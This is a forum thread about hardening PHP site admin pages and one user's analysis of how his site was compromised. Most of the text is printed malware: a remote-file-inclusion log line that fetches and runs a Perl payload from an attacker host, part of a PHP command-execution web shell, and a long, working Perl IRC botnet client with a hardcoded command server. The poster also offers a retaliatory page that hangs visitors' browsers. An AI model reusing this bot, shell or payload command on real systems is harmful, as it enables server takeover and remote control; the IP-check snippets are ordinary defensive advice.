dslreports logo
 
    All Forums Hot Topics Gallery
spc
Search similar:


uniqs
6685

ZOverLord
Premium Member
join:2003-10-20
Minneapolis, MN

ZOverLord

Premium Member

How To Fortify Your PHP Based Web Site Admin Functions

Not everyone is a programmer, so here are some simple steps to help avoid abuse of any admin function if you have a PHP based web site.

This will work if you have a dedicated IP address and stops Admin function Exploits. In most cases most PHP based web sites have some program normally called admin.php to provide Admin functions.

If you have a dedicated IP address that you normally use to manage your PHP based web site you can do this to stop the current rash of exploits.

Make sure you save a copy while you test.

Using FTP download a copy of your admin.php program and use notepad to insert the following lines after the ?php line at the top:

// IP check for Admin fuctions in admin.php ZOverLord

if ($_SERVER["REMOTE_ADDR"] <> 'xx.xx.xx.xx') {
echo "You are ???????? and are ??????? STUPID as WELL!";
return true;
}

// END of IP check for Admin fuctions in admin.php

Replace the xx.xx.xx.xx with your IP address, try a wrong one FIRST, to make sure you really deny the request, upload it via FTP to your site then try the valid one.

If your IP address changes you can always follow the same procedure. If anyone needs an example for multiple IP address checks I can also show that as well. Initially trying to keep it simple.

You also can create your own message I replaced some text with question marks for this post, use your imagination on what it was ;)
JTS33
join:2003-05-03
USA

JTS33

Member

For those who don't have dedicated IP, can you use wildcards? For example, if you wanted to allow all IPs which start with 87.126.x.x

This would at least stop all of those who aren't using the same ISP as you.

ZOverLord
Premium Member
join:2003-10-20
Minneapolis, MN

1 edit

ZOverLord

Premium Member

said by JTS33:

For those who don't have dedicated IP, can you use wildcards? For example, if you wanted to allow all IPs which start with 87.126.x.x

This would at least stop all of those who aren't using the same ISP as you.
Well, in this example the IP must match the entire IP address.

There are ways using PHP to do partial IP compares, but this example does not support anything but the entire IP being compared.

You can also test this change at anytime by doing something like this:

http://anonymouse.org/cgi-bin/anon-www.cgi/http://<Your Web Site Goes Here!>/admin.php

state
stress magnet
Mod
join:2002-02-08
Purgatory

state to JTS33

Mod

to JTS33
said by JTS33:

For those who don't have dedicated IP, can you use wildcards? For example, if you wanted to allow all IPs which start with 87.126.x.x
This should work for partial IP matches:

php code:
if (!eregi("^87.126." ,$_SERVER["REMOTE_ADDR"])) {
echo "You are ???????? and are ??????? STUPID as WELL!";
return true;
}

Thug21
Just Chillin'
Premium Member
join:2005-08-21

Thug21 to ZOverLord

Premium Member

to ZOverLord
How would you do this for people that have a very dynamic IP, say one that varies around from 68.000.000.000 to 71.000.000.000

ZOverLord
Premium Member
join:2003-10-20
Minneapolis, MN

4 edits

ZOverLord

Premium Member

// IP check for Admin fuctions in admin.php ZOverLord
$ip = preg_split("/./", $REMOTE_ADDR);
if (($ip[0] < 68) OR ($ip[0] > 71)) {
echo "You are ???????? and are ??????? STUPID as WELL!";
return true;
}
// END of IP check for Admin fuctions in admin.php

Thug21
Just Chillin'
Premium Member
join:2005-08-21

Thug21 to ZOverLord

Premium Member

to ZOverLord
Thank you.

ZOverLord
Premium Member
join:2003-10-20
Minneapolis, MN

ZOverLord

Premium Member

You are very welcome
ZOverLord

4 edits

ZOverLord

Premium Member

There is a rising rash of PHP site exploits that I kind of got dragged into by my site being defaced. If you have a PHP based site my suggestion would be to check your logs and see if you have any entries trying to pass another site name as a root path using any of your PHP admin interfaces.

These exploits may not even cause your site to visually see anything unusual, however your site can/could be used as a link to other PHP sites on the server that you are being hosted on. Even if this is not the case, your site could actually be supporting methods to gain access too many other PHP based sites as a chain of sites used to attempt to hide the real IPs of people using these exploits.

During my Research/fortifying of my site I found that my site was being used by hundereds of people and linked to well over 50 other sites used for similar purposes.

This group is basically injecting PHP to provide scanning of thousands of sites at a time, as well as IRC chat rooms interfaces, and much more.

The most complicated thing was trying to DRILL down to the real IP addresses of this very large group, so I could provide them to the proper authorities. They use so many other sites as a bridge that by the time you try to isolate their IP, you and them are sometimes buffered by as many as 5 other web sites they are using as bridge sites to get to you.

This chain is automated, so when a link in the chain ("My Site") suddenly stops bridging to the next site and so on, their communications link FAILS, and they have a very hard time trying to locate which one of their bridge sites used as a link failed.

So, here is what I did to isolate their IPs, please note this only works with IE for the moment, but turns out most of them had IE anyway.

In June of 2005, Mark at Sysinternals did an article on Pop-Up Blockers and how they can be defeated:

»www.sysinternals.com/blo ··· ker.html

I took his example from Malware.com ("There is a Link on Mark's Blog in the above link") and modified it for PHP. My version is much more nasty, and actually can provide the IP address of the actual person attempting to exploit a PHP web site provided they are using IE ("Working on methods for other browsers") but is shuts down all access by to all my Admin functions by everyone but me.

Of someone would like to implement this concept on their PHP web site, just shout, I will give you the 3 files, and php stub code that needs to be in your Admin modules.

For the Daring, you are more than welcome to go to this address with your browser to see what NOW happens when others attempt to use my Admin functions on my site. Please be aware that it contains shall we say some "Harsh" language, and make sure you have your task manager open so that you can kill the IEXPLORER.EXE if needed.

I could use some feedback on what browsers supply the REAL IP address ("I don't have all browsers") I have tested with Firefox ("Only Displays One Page"), AOL Browser and IE.

A link example of a link to attempt to hide your real IP address and see this would be:

Please be aware, you MAY need to kill IEXPLORER.EXE to recover and stop this


http://anonymouse.org/cgi-bin/anon-www.cgi/http://testing.onlytherightanswers.com/admin.php


Of course you could use others.

This group has moved on, once I broke their communications chain, and they provided me most of their IP addresses while they poked around, which I reported to the proper authorities. It's important to note I said "Moved On" because groups like this have way too many victim sites to ever really go away.

I also went to some of the other sites in the chain ("My site was being used for ALL menu options to the sites that hosted them, so I was able to see what was "Parked" and being used on for all the menu options, in most cases, these options were stored in the TMP directory on those sites, but not in every case") and was amazed at how sophisticated this group was/is. Each web site in the chain hosts some add in tool for them, a scanner, IRC chat, many other tools that they pick and choose from by menu option, and actually found their login/password interface with near 100 id's to use the chain my site was in.

That's part of their problem I think, in this case, is that their menu options link to specific sites, for each option, but the users of the menu, really don't know easily which menu option goes to what site, so when the users communication chain fails, they get stuck for awhile trying to find out what is going wrong.

Actually my site was a bridge to the other sites supporting the menu options chain ("My Site was being used as a bridge to get from the menu options to the sites supporting that menu option, most likely to hide their IP addresses, so it would look like my site went to the sites supporting the menu options, not them") and used for routing, so when I fortified my site, most, if not all their menu options failed, "They FREAKED!".

By spreading their menu options across many web sites, if one site is "Locked Down" they simply look for another, and hack that site to support that menu option, and update their menu, so there must be a select few in the group that maintain the menu linkage. They also seem to use a chain of sites to bridge to the sites that have to menu option, this must be to mask server logs and create confusion, and it works well, since most of the victim sites, have no idea they are in the chain.

Hopefully, if you maintain a PHP based site they have not moved on from my site to you.

As stated earlier, if anyone wants the code that does this shout, and I will send it to you in a Zip file, it is actually very small for what it does.

Cudni
La Merma - Vigilado
MVM
join:2003-12-20
Someshire

Cudni

MVM

using tor and ff i get a rude message

Cudni

ZOverLord
Premium Member
join:2003-10-20
Minneapolis, MN

ZOverLord

Premium Member

said by Cudni:

using tor and ff i get a rude message

Cudni
Thanks, yes ff only displays one page, and of course the text can be changed

The method I used works best with IE at the moment, am working on some code to do what happens in IE in ff.

In all cases the person(s) attempting to gain access are still denied, just that if they are using IE, it's not a pretty sight for them.

Some might say "If you make them MAD, things will get worse" well after doing extensive reviews of my site log ("Which is more of a hobby Site") on a normal day 20-50 attempts were made on average, before this large group called my site home, lol.

garys_2k
Premium Member
join:2004-05-07
Farmington, MI

garys_2k to ZOverLord

Premium Member

to ZOverLord
Opening that with IE, I get an Office install dialog, which I kill (have to hit cancel twice) and that's it. No way I'd let a page mess with Office stuff.

ZOverLord
Premium Member
join:2003-10-20
Minneapolis, MN

ZOverLord

Premium Member

said by garys_2k:

Opening that with IE, I get an Office install dialog, which I kill (have to hit cancel twice) and that's it. No way I'd let a page mess with Office stuff.
Funny, it's not really anything to do with office, but it is an ActiveX control by Microsoft for their DHTML editor, don't have Office here, have Open Office, but nice to know if you have Office, you get that prompt.
ZOverLord

ZOverLord

Premium Member

Ok, I have been asked to break this down a little bit, so I will show you what is going on, remember I have a Nuke site, so try to follow even for other php based sites.

My site name is testing.onlytherightanswers.com ("One subdomain that is") After my site was defaced I did some Deep log analysis. I found many requests from many different IP addresses:


85.195.123.29 - - [16/Jun/2006:20:54:28 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.exchangechannel.com/welcome/family/php/images/.xpl/cmd.txt?&cmd=cd%20/tmp;fetch%20http://www.exchangechannel.com/welcome/family/php/images/.xpl/flux;perl%20flux;rm%20flux*? HTTP/1.0"

So I Broke This Down, and checked what was going on. The contents of cmd.txt is:


&1");
else
@passthru("$cmd");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output))
echo str_replace(">", ">", str_replace("<", "<", $output));
}
else
echo "No command to execute.";
}
else {
echo "Due to SafeMode, it's unable to execute commands!\n";

echo "Machine informations:\n";
echo "PHP: ".phpversion()."\n";
echo "Server: $SERVER_SOFTWARE $SERVER_VERSION\n";
$uname = @posix_uname();
if (!empty($uname)) {
while (list($info, $value) = each($uname))
echo "$value ";
echo "\n";
}
$uids = @posix_getlogin();
$euids = @posix_getlogin();
$uid = @posix_getuid();
$euid = @posix_geteuid();
$gid = @posix_getgid();
if (!empty($uid))
echo "User: uid=$uids($uid) euid=$euid($euid) gid=$gid($gid)\n";
}

?>

The conents of flux is:


#!/usr/bin/perl
# #myhack crew (KingFighter)
# PVT!! PVT!! PVT!!

my @nickname = ("index.php?page=",
"Abdulrazak",
"Ackerman",
"Adams",
"Addison",
"Adelstein",
"Adibe",
"Adorno",
"Ahlers",
"Alavi",
"Alcorn",
"Alda",
"Aleks",
"Allison",
"Alongi",
"Altavilla",
"Altenberger",
"Altenhofen",
"Amaral",
"Amatangelo",
"Ameer",
"Amsden",
"Anand",
"Andel",
"Ando",
"Andrelus",
"Andron",
"Anfinrud",
"Ansley",
"Anthony",
"Antos",
"Arbia",
"Arduini",
"Arellano",
"Aristotle",
"Arjas",
"Arky",
"Atkins",
"Augustus",
"Aurelius",
"Axelrod",
"Axworthy",
"Ayiemba",
"Aykroyd",
"Ayling",
"Azima",
"Bachmuth",
"Backus",
"Bady",
"Baglivo",
"Bagnold",
"Bailar",
"Bakanowsky",
"Baleja",
"Ballatori",
"Ballew",
"Baltz",
"Banta",
"Barabesi",
"Barajas",
"Baranczak",
"Baranowska",
"Barberi",
"Barbetti",
"Barneson",
"Barnett",
"Barriola",
"Barry",
"Bartholomew",
"Bartolome",
"Bartoo",
"Basavappa",
"Bashevis",
"Batchelder",
"Baumiller",
"Bayles",
"Bayo",
"Beacon",
"Beal",
"Bean",
"Beckman",
"Beder",
"Bedford",
"Behenna",
"Belanger",
"Belaoussof",
"Belfer",
"Belin-Collart",
"Bellavance",
"Bellhouse",
"Bellini",
"Belloc",
"Benedict-Dye",
"Bergson",
"Berke-Jenkins",
"Bernardo",
"Bernassola",
"Bernston",
"Berrizbeitia",
"Betti",
"Beynart",
"Biagioli",
"Bickel",
"Binion",
"Bir",
"Bisema",
"Bisho",
"Blackbourn",
"Blackwell",
"Blagg",
"Blakemore",
"Blanke",
"Bliss",
"Blizard",
"Bloch",
"Bloembergen",
"Bloemhof",
"Bloxham",
"Blyth",
"Bolger",
"Bolick",
"Bollinger",
"Bologna",
"Boner",
"Bonham",
"Boniface",
"Bontempo",
"Book",
"Bookbinder",
"Boone",
"Boorstin",
"Borack",
"Borden",
"Bossi",
"Bothman",
"Botosh",
"Boudin",
"Boudrot",
"Bourneuf",
"Bowers",
"Boxer",
"Boyajian",
"Boyes",
"Boyland",
"Boym",
"Boyne",
"Bracalente",
"Bradac",
"Bradach",
"Brecht",
"Breed",
"Brenan",
"Brennan",
"Brewer",
"Brewer",
"Bridgeman",
"Bridges",
"Brinton",
"Britz",
"Broca",
"Brook",
"Brzycki",
"Buchan",
"Budding",
"Bullard",
"Bunton",
"Burden",
"Burdzy",
"Burke",
"Burridge",
"Busetta",
"Byatt",
"Byerly",
"Byrd",
"Cage",
"Calnan",
"Cammelli",
"Cammilleri",
"Canley",
"Capanni",
"Caperton",
"Capocaccia",
"Capodilupo",
"Cappuccio",
"Capursi",
"Caratozzolo",
"Carayannopoulos",
"Carlin",
"Carlos",
"Carlyle",
"Carmichael",
"Caroti",
"Carper",
"Cartmill",
"Cascio",
"Case",
"Caspar",
"Castelda",
"Cavanagh",
"Cavell",
"Ceniceros",
"Cerioli",
"Chapman",
"Charles",
"Cheang",
"Cherry",
"Chervinsky",
"Chiassino",
"Chien",
"Childress",
"Childs",
"Chinipardaz",
"Chinman",
"Christenson",
"Christian",
"Christiano",
"Christie",
"Christopher",
"Chu",
"Chupasko",
"Church",
"Ciampaglia",
"Cicero",
"Cifarelli",
"Claffey",
"Clancy",
"Clark",
"Clement",
"Clifton",
"Clow",
"Coblenz",
"Coito",
"Coldren",
"Colella",
"Collard",
"Collis",
"Compton",
"Compton",
"Comstock",
"Concino",
"Condodina",
"Connors",
"Corey",
"Cornish",
"Cosmides",
"Counter",
"Coutaux",
"Crawford",
"Crocker",
"Croshaw",
"Croxen",
"Croxton",
"Cui",
"Currier",
"Cutler",
"Cvek",
"Cyders",
"daSilva",
"Daldalian",
"Daly",
"D'Ambra",
"Danieli",
"Dante",
"Dapice",
"D'arcangelo",
"Das",
"Dasgupta",
"Daskalu",
"David",
"Dawkins",
"DeGennaro",
"DeLaPena",
"del'Enclos",
"deRousse",
"Debroff",
"Dees",
"Defeciani",
"Delattre",
"Deleon-Rendon",
"Delger",
"Dell'acqua",
"Deming",
"Dempster",
"Demusz",
"Denault",
"Denham",
"Denison",
"Desombre",
"Deutsch",
"D'fini",
"Dicks",
"Diefenbach",
"Difabio",
"Difronzo",
"Dilworth",
"Dionysius",
"Dirksen",
"Dockery",
"Doherty",
"Donahue",
"Donner",
"Doonan",
"Dore",
"Dorf",
"Dosi",
"Doty",
"Doug",
"Dowsland",
"Drinker",
"D'souza",
"Duffin",
"Durrett",
"Dussault",
"Dwyer",
"Eardley",
"Ebeling",
"Eckel",
"Edley",
"Edner",
"Edward",
"Eickenhorst",
"Eliasson",
"Elmendorf",
"Elmerick",
"Elvis",
"Encinas",
"Enyeart",
"Eppling",
"Erbach",
"Erdman",
"Erdos",
"Erez",
"Espinoza",
"Estes",
"Etter",
"Euripides",
"Everett",
"Fabbris",
"Fagan",
"Faioes",
"Falco-Acosta",
"Falorsi",
"Faris",
"Farone",
"Farren",
"Fasso'",
"Fates",
"Feigenbaum",
"Fejzo",
"Feldman",
"Fernald",
"Fernandes",
"Ferrante",
"Ferriell",
"Feuer",
"Fido",
"Field",
"Fink",
"Finkelstein",
"Finnegan",
"Fiorina",
"Fisk",
"Fitzmaurice",
"Flier",
"Flores",
"Folks",
"Forester",
"Fortes",
"Fortier",
"Fossey",
"Fossi",
"Francisco",
"Franklin-Kenea",
"Franz",
"Frazier-Davis",
"Freid",
"Freundlich",
"Fried",
"Friedland",
"Frisken",
"Frowiss",
"Fryberger",
"Frye",
"Fujii-Abe",
"Fuller",
"Furth",
"Fusaro",
"Gabrielli",
"Gaggiotti",
"Galeotti",
"Galwey",
"Gambini",
"Garfield",
"Garman",
"Garonna",
"Geller",
"Gemberling",
"Georgi",
"Gerrett",
"Ghorai",
"Gibbens",
"Gibson",
"Gilbert",
"Gili",
"Gill",
"Gillispie",
"Gist",
"Gleason",
"Glegg",
"Glendon",
"Goldfarb",
"Goncalves",
"Good",
"Goodearl",
"Goody",
"Gozzi",
"Gravell",
"Greenberg",
"Greenfeld",
"Griffiths",
"Grigoletto",
"Grummell",
"Gruner",
"Gruppe",
"Guenthart",
"Gunn",
"Guo",
"Ha",
"Haar",
"Hackman",
"Hackshaw",
"Haley",
"Halkias",
"Hallowell",
"Halpert",
"Hambarzumjan",
"Hamer",
"Hammerness",
"Hand",
"Hanssen",
"Harding",
"Hargraves",
"Harlow",
"Harrigan",
"Hartman",
"Hartmann",
"Hartnett",
"Harwell",
"Haviaras",
"Hawkes",
"Hayes",
"Haynes",
"Hazlewood",
"Heermans",
"Heft",
"Heiland",
"Hellman",
"Hellmiss",
"Helprin",
"Hemphill",
"Henery",
"Henrichs",
"Hernandez",
"Herrera",
"Hester",
"Heubert",
"Heyeck",
"Himmelfarb",
"Hind",
"Hirst",
"Hitchcock",
"Hoang",
"Hock",
"Hoffer",
"Hoffman",
"Hokanson",
"Hokoda",
"Holmes",
"Holoien",
"Holter",
"Holway",
"Holzman",
"Hooker",
"Hopkins",
"Horsley",
"Hoshida",
"Hostage",
"Hottle",
"Howard",
"Hoy",
"Huey",
"Huidekoper",
"Hungerford",
"Huntington",
"Hupp",
"Hurtubise",
"Hutchings",
"Hyde",
"Iaquinta",
"Ichikawa",
"Igarashi",
"Inamura",
"Inniss",
"Isaac",
"Isaievych",
"Isbill",
"Isserman",
"Iyer",
"Jacenko",
"Jackson",
"Jagers",
"Jagger",
"Jagoe",
"Jain",
"Jamil",
"Janjigian",
"Jarnagin",
"Jarrell",
"Jay",
"Jeffers",
"Jellis",
"Jenkins",
"Jespersen",
"Jewett",
"Johannesson",
"Johannsen",
"Johns",
"Jolly",
"Jorgensen",
"Jucks",
"Juliano",
"Julious",
"Kabbash",
"Kaboolian",
"Kafadar",
"Kalbfleisch",
"Kaligian",
"Kalil",
"Kalinowski",
"Kalman",
"Kamel",
"Kangis",
"Karpouzes",
"Kassower",
"Kasten",
"Kawachi",
"Kee",
"Keenan",
"Keepper",
"Keith",
"Kelker",
"Kelsey",
"Kempton",
"Kemsley",
"Kendall",
"Kerry",
"Keul",
"Khong",
"Kimmel",
"Kimmett",
"Kimura",
"Kindall",
"Kinsley",
"Kippenberger",
"Kirscht",
"Kittridge",
"Kleckner",
"Kleiman",
"Kleinfelder",
"Klemperer",
"Kling",
"Klinkenborg",
"Klint",
"Knuff",
"Kobrick",
"Koch",
"Kohn",
"Koivumaki",
"Kommer",
"Koniaris",
"Konrad",
"Kool",
"Korzybski",
"Kotter",
"Kovaks",
"Kraemer",
"Krailo",
"Krasney",
"Kraus",
"Kroemer",
"Krysiak",
"Kuenzli",
"Kumar",
"Kusman",
"Kuwabara",
"La",
"Labunka",
"Lafler",
"Laing",
"Lallemant",
"Landes",
"Lankes",
"Lantieri",
"Lanzit",
"Laserna",
"Lashley",
"Lawless",
"Lecar",
"Lecce",
"Leclercq",
"Leite",
"Lenard",
"l'Enclos",
"Lesser",
"Lessi",
"Liakos",
"Lidano",
"Liem",
"Light",
"Lightfoot",
"Lim",
"Linares",
"Linda",
"Linder",
"Line",
"Linehan",
"Linzee",
"Lippmann",
"Lipponen",
"Little",
"Litvak",
"Livernash",
"Livi",
"Livolsi",
"Lizardo",
"Locatelli",
"Longworth",
"Loss",
"Loveman",
"Lowenstein",
"Loza",
"Lubin",
"Lucas",
"Luciano",
"Luczkow",
"Luecke",
"Lunetta",
"Luoma",
"Lussier",
"Lutcavage",
"Luzader",
"Ma",
"Maccormac",
"Macdonald",
"Maceachern",
"Macintyre",
"Mackenney",
"MacMillan",
"Macy",
"Madigan",
"Maggio",
"Mahony",
"Maier",
"Maine-Hershey",
"Maisano",
"Malatesta",
"Maller",
"Malova",
"Manalis",
"Mandel",
"Manganiello",
"Mantovan",
"March",
"Marchbanks",
"Marcus",
"Margalit",
"Margetts",
"Marques",
"Martinez",
"Martochio",
"Marton",
"Marubini",
"Mass",
"Matalka",
"Matarazzo",
"Matsukata",
"Mattson",
"Mauzy",
"May",
"Mazzali",
"Mazziotta",
"Mcbride",
"Mccaffery",
"Mccall",
"Mcclearn",
"Mcdowell",
"Mcelroy",
"McFadden",
"Mcghee",
"Mcgoldrick",
"McIlroy",
"Mcintosh",
"Mckenna",
"Mclane",
"Mclaren",
"Mcnealy",
"Mcnulty",
"Meccariello",
"Memisoglu",
"Menzies",
"Merikoski",
"Merlani",
"Merminod",
"Merseth",
"Merz",
"Metelka",
"Metropolis",
"Meurer",
"Michelman",
"Middle",
"Mieher",
"Mills",
"Minh",
"Mini",
"Minichiello",
"Gonzalez",
"Mitropoulos",
"Mittal",
"Mocroft",
"Modestino",
"Moeller",
"Mohr",
"Moiamedi",
"Monque",
"Montilio",
"MooreDeCh.",
"Morani",
"Moreton",
"Morrison",
"Morrow",
"Mortimer",
"Mosher",
"Mosler",
"Mostafavi",
"Motooka",
"Mudarri",
"Muello",
"Mugnai",
"Mulkern",
"Mulroy",
"Mumford",
"Mussachio",
"Naddeo",
"Napolitano",
"Nardi",
"Nardone",
"Naviaux",
"Nayduch",
"Nelson",
"Nenna",
"Nesci",
"Neuman",
"Newfeld",
"Newlin",
"Ng",
"Ni",
"Nickerson",
"Nickoloff",
"Nisenson",
"Nitabach",
"Notman",
"Nuzum",
"Ocougne",
"Ogata",
"Oh",
"O'hagan",
"Oldford",
"Olsen",
"Olson",
"Olszewski",
"O'malley",
"Oman",
"O'meara",
"Opel",
"Oray",
"Orfield",
"Orsi",
"Ospina",
"Ostrowski",
"Ottaviani",
"Otten",
"Ouchida",
"Ovid",
"PaesDealmeida",
"Paine",
"Palayoor",
"Palepu",
"Pallara",
"Palmitesta",
"Panadero",
"Panizzon",
"Pantilla",
"Paoletti",
"Parmeggiani",
"Parris",
"Partridge",
"Pascucci",
"Patefield",
"Patrick",
"Pattullo",
"Pavetti",
"Pavlon",
"Pawloski",
"Paynter",
"Peabody",
"Pearlberg",
"Pederson",
"Peishel",
"Penny",
"Pereira",
"Perko",
"Perlak",
"Perlman",
"Perna",
"Perone",
"Perrimon",
"Peters",
"Petruzello",
"Pettibone",
"Pettit",
"Pfister",
"Pilbeam",
"Pinot",
"Plancon",
"Plant",
"Plasket",
"Plous",
"Po",
"Pocobene",
"Poincaire",
"Pointer",
"Poirier",
"Polak",
"Polanyi",
"Politis",
"Poma",
"Poolman",
"Powers",
"Presper",
"Preucel",
"Prevost",
"Pritchard",
"Pritz",
"Proietti",
"Prothrow-Stith",
"Puccia",
"Pugh",
"Pynchon",
"Quaday",
"Quetin",
"Rabe",
"Rabkin",
"Radeke",
"Rajagopalan",
"Raney",
"Rangan",
"Rankin",
"Rapple",
"Rayport",
"Redden-Tyler",
"Reedquist",
"Cunningham",
"Reinold",
"Remak",
"Renick",
"Repetto",
"Resnik",
"Rhea",
"Richmond",
"Rielly",
"Rindos",
"Rineer",
"Rish",
"Rivera",
"Robinson",
"Rocha",
"Roesler",
"Rogers",
"Ronen",
"Row",
"Royal",
"Ru",
"Ruan",
"Ruderman",
"Ruescher",
"Rush",
"Ryu",
"Sabatello",
"Sadler",
"Safire",
"Sahu",
"Sali",
"Samson",
"Sanchez-Ramirez",
"Sanna",
"Sapers",
"Sarin",
"Sartore",
"Sase",
"Satin",
"Satta",
"Satterthwaite",
"Sawtell",
"Sayied",
"Scarponi",
"Scepan",
"Scharf",
"Scharlemann",
"Scheiner",
"Schiano",
"Schifini",
"Schilling",
"Schmitt",
"Schossberger",
"Schuman",
"Schutte",
"Schuyler",
"Schwan",
"Schwickrath",
"Scovel",
"Scudder",
"Seaton",
"Seeber",
"Segal",
"Sekler",
"Selvage",
"Sen",
"Sennett",
"Seterdahl",
"Sexton",
"Seyfert",
"Shaikh",
"Shakis",
"Shankland",
"Shanley",
"Shar",
"Shatrov",
"Shavelson",
"Shea",
"Sheats",
"Shepherd",
"Sheppard",
"Shepstone",
"Shesko",
"Shia",
"Shibata",
"Shimon",
"Siesto",
"Sigalot",
"Sigini",
"Signa",
"Silverman",
"Silvetti",
"Sinsabaugh",
"Sirilli",
"Sites",
"Skane",
"Skerry",
"Skoda",
"Sloan",
"Slowe",
"Smilow",
"Sniffen",
"Snodgrass",
"Socolow",
"Solon",
"Somers",
"Sommariva",
"Sorabella",
"Sorg",
"Sottak",
"Soukup",
"Soule",
"Soultanian",
"Spanier",
"Sparrow",
"Spaulding",
"Speizer",
"Spence",
"Sperber",
"Spicer",
"Spiegelhalter",
"Spiliotis",
"Spinrad",
"StMartin",
"Stalvey",
"Stam",
"Stang",
"Stassinopolus",
"States",
"Statlender",
"Stefani",
"Steiner",
"Stephanian",
"Stepniewska",
"Stewart-Oaten",
"Stiepock",
"Stillwell",
"Stock",
"Stockton",
"Stockwell",
"Stolzenberg",
"Stonich",
"Storer",
"Stott",
"Strange",
"Strauch",
"Streiff",
"Stringer",
"Sullivan",
"Sumner",
"Suo",
"Surdam",
"Sweeting",
"Sweetser",
"Swindle",
"Tagiuri",
"Tai",
"Talaugon",
"Tambiah",
"Tandler",
"Tanowitz",
"Tatar",
"Taveras",
"Tawn",
"Tcherepnin",
"Teague",
"Temes",
"Temmer",
"Tenney",
"Terracini",
"Than",
"Thavaneswaran",
"Theodos",
"Thibault",
"Thisted",
"Thomsen",
"Throop",
"Tierney",
"Till",
"Timmons",
"Tofallis",
"Tollestrup",
"Tolls",
"Tolman",
"Tomford",
"Toomer",
"Topulos",
"Torresi",
"Torske",
"Towler",
"Toye",
"Traebert",
"Trenga",
"Trewin",
"Tringali",
"Troiani",
"Troy",
"Truss",
"Tsiatis",
"Tsomides",
"Tsukurov",
"Tuck",
"Tudge",
"Tukan",
"Turano",
"Turek",
"Tuttle",
"Twells",
"Tzamarias",
"Ullman",
"Untermeyer",
"Upsdell",
"Urban",
"Urdang-Brown",
"Usdan",
"Uzuner",
"Vacca",
"Waite",
"Valberg",
"Valencia",
"Wales",
"Wallenberg",
"Walter",
"vanAllen",
"VanZwet",
"Vandenberg",
"Vanheeckeren",
"Warshafsky",
"Wasowska",
"Vasquez",
"Waugh",
"Weighart",
"Weingarten",
"Weinhaus",
"Weissbourd",
"Weissman",
"Velasquez",
"Welles",
"Welsh",
"Wengret",
"Venne",
"Verghese",
"Wescott",
"Wetzel",
"Whately",
"Whilton",
"White",
"Whitla",
"Whittaker",
"Viana",
"Viano",
"Wiedersheim",
"Wiener",
"Viens",
"Vignola",
"Wilder",
"Wilhelm",
"Wilk",
"Wilkin",
"Wilkinson",
"Villarreal",
"Willstatter",
"Wilson",
"Vitali",
"Viviani",
"Voigt",
"Wolk",
"VonHoffman",
"Woo",
"Wooden",
"Woods",
"Woods-Powell",
"Vorhaus",
"Votey",
"Yacono",
"Yamane",
"Yankee",
"Yarchuk",
"Yates",
"Ybarra",
"Yedidia",
"Yesson",
"Yetiv",
"Yoffe",
"Yoo",
"Youk-See",
"Yu",
"Zachary",
"Zahedi",
"Zangwill",
"Zegans",
"Zerbini",
"Zoldak",
"Zucconi",
"Zurn",
"Zwiers");

my $nick = $nickname[rand scalar @nickname];

my $ircname = $nickname[rand scalar @nickname];

my $processo = 'httpdse';

system("kill -9 `ps ax |grep httpde |grep -v grep|awk '{print $1;}'`");

# funny world...

my $linas_max='4';
my $sleep='5';
my @adms=("KingFighter","apaii");
my @hostauth=("leet.net");
my @canais=("#conn");
chop (my $realname = 'id');
$servidor='emilya1.no-ip.org' unless $servidor;
my $porta='6667';
my $VERSAO = 'Cygrip powered by KingFighter';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}

sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];

my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;

$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);

$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);

for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}

sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
